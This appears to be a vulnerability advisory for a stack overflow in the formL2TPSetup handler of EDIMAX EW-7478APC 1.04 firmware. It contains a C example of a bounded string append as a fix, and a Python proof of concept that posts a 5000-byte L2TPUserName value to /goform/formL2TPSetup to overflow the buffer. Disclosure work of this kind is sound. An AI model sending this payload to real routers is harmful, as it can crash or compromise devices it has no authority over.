Overview

Affected version

EW-7478APC 1.04

Vulnerability details

The EDIMAX EW-7478APC 1.04 firmware has a stack overflow vulnerability in the formL2TPSetup function. The v106 variable receives the L2TPUserName parameter from a POST request. Because the user controls the input of L2TPUserName, the subsequent strcat() call can overflow the buffer.
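
A bounded-append pattern that removes this class of bug, as an added example (not the vendor's firmware code and not code from this advisory). The buffer size, the 64-byte username limit, the "user=" prefix and both function names are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define SETTING_BUF_SIZE 128  /* assumed; the advisory does not give the real size */
#define L2TP_USER_MAX     64  /* assumed policy limit for L2TPUserName */

/* Append src to dst, whose total capacity is cap bytes including the NUL.
 * Returns 0 on success, -1 if it would not fit; dst is unchanged on failure. */
static int bounded_append(char *dst, size_t cap, const char *src)
{
    const char *end = memchr(dst, '\0', cap);
    size_t used, need = strlen(src);

    if (end == NULL)              /* dst is not terminated inside its buffer */
        return -1;
    used = (size_t)(end - dst);
    if (need >= cap - used)       /* no room for src plus the terminator */
        return -1;
    memcpy(dst + used, src, need + 1);
    return 0;
}

/* Hypothetical stand-in for the handler step that concatenates the username.
 * Rejects the request instead of truncating, so no partial value is stored. */
static int build_l2tp_user_setting(const char *username, char *out, size_t out_cap)
{
    if (username == NULL || out == NULL || out_cap == 0)
        return -1;
    if (strlen(username) > L2TP_USER_MAX)   /* validate before any copy */
        return -1;
    out[0] = '\0';
    if (bounded_append(out, out_cap, "user=") != 0)   /* constructed prefix */
        return -1;
    return bounded_append(out, out_cap, username);
}

int main(void)
{
    char setting[SETTING_BUF_SIZE];
    char oversized[5001];                   /* constructed 5000-byte input */

    memset(oversized, 'A', sizeof oversized - 1);
    oversized[sizeof oversized - 1] = '\0';
    printf("normal:    %d\n", build_l2tp_user_setting("alice", setting, sizeof setting));
    printf("oversized: %d\n", build_l2tp_user_setting(oversized, setting, sizeof setting));
    return 0;
}
```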


POC

import requests

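# Management address of the device under test
ip = "192.168.2.1"

# Oversized value for L2TPUserName, the field that reaches strcat() in formL2TPSetup
payload = "A"*5000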
data = {
    "submit-url":      "/",
    "L2TPConnect":     "",
    "L2TPDisconnect":  "",
    "L2TPIpMode":      "",
    "macAddr1":        "",
    "enableDuallAccess": "",
    "DUAL_WAN_IGMP":   "",
    "DNSMode":         "",
    "L2TPIPAddr":      "",
    "L2TPMaskAddr":    "",
    "L2TPDefGateway":  "",
    "L2TPGateway":     "",
    "L2TPUserName":    payload,
    "L2TPPassword":    "",
    "L2TPMTU":         "",
    "L2TPConnectType": "",
    "wanMode":         "",
    "isApply":         "",
    "redirect":        "",
}

# Form handler that processes the L2TP settings
url = f'http://{ip}/goform/formL2TPSetup'

# Submit the form and print the response object
res = requests.post(url=url, data=data, verify=False)
print(res)
